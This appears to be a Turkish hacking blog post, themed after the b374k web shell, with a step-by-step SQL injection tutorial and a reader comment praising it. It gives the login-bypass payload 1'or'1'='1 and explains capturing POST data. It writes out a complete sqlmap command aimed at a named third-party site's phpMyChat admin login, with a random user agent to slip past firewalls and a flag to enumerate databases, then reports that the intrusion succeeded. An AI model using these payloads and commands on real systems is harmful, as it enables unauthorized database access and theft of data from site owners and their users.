b374k
v2.8
today : | at : | safemode : ON
/ var / www / public_html
name author perms com modified label

SQLmap Post Attack b374k rwxr-xr-x 1 Mart 16, 2017

Filename SQLmap Post Attack
Permission rw-r--r--
Author b374k
Date and Time Mart 16, 2017
Label
Action
Genel de en bilindik sql injection id=1' olur fakat az bilinen çok uygulanan
bir atak daha vardır login kısımlarına uyguladığımız 1'or'1'='1 login bypass
teknikleri vardır aynı açıktan yola çıkarak veritabanına erişmek mümkündür
şöyle ki ;

Şöyle bir login şifre ve kullanıcı adına ' tırnak koyalım ve test edelim

Testimiz başarılı hata mesajı verdirebildik.


Şimdi Mozilla Firefox tarayıcımıza Live HTTP Headers eklentisini yükleyelim
post edilen datayı daha sağlıklı görüp almak için yükledikten sonra
Araçlar kısmından eklentiyi seçelim


şimdi Capture seçeneği seçili iken rastgele kullanıcı adı şifre girelim
seçili kısımdaki gibi data çıkacak;

"L=spanish&Link=&LIMIT=&pmc_username=k4y4&pmc_password=k4y4&login_form=Ingresar"
şimdi SQLmap uygulamasını çalıştıralım ve komutumuzu girelim siz komutu girin ben o sırada parametreleri anlatayım; 

sqlmap -u "http://www.sistemleg.com/phpmychat/admin.php" --data="L=spanish&Link=&LIMIT=&pmc_username=k4y4&pmc_password=k4y4&login_form=Ingresar" -p "pmc_username" --batch --random-agent --dbs

-u (açığın bulunduğu adres)
--data (açığın post ettiği data live http headers ile aldık)
-p (data için de açığın bulunduğu input name i)
--batch (hızlı bi sonuç için programın seçeneklerini seçer)
--random-agent (güvenlik duvarı aşmak için user agent kullanımı)
--dbs (database's veritabanlarının adını yazdırmak)
Veritabanına sızma işlemi başarı ile gerçekleşti

1 yorum:

mehmet dedi ki...

hocam çok güzel anlatmışsınız. bende sikul injection dersi ararken sitenizi buldum valla güzl anltmışşınız. imşallah bende birgn sizim giibi birisi oluruum. anlatın iin teşekkğrler hocam

Yorum Gönder

 

b374k © 2015 b374k | Cyber Security
b374k Template design by b374k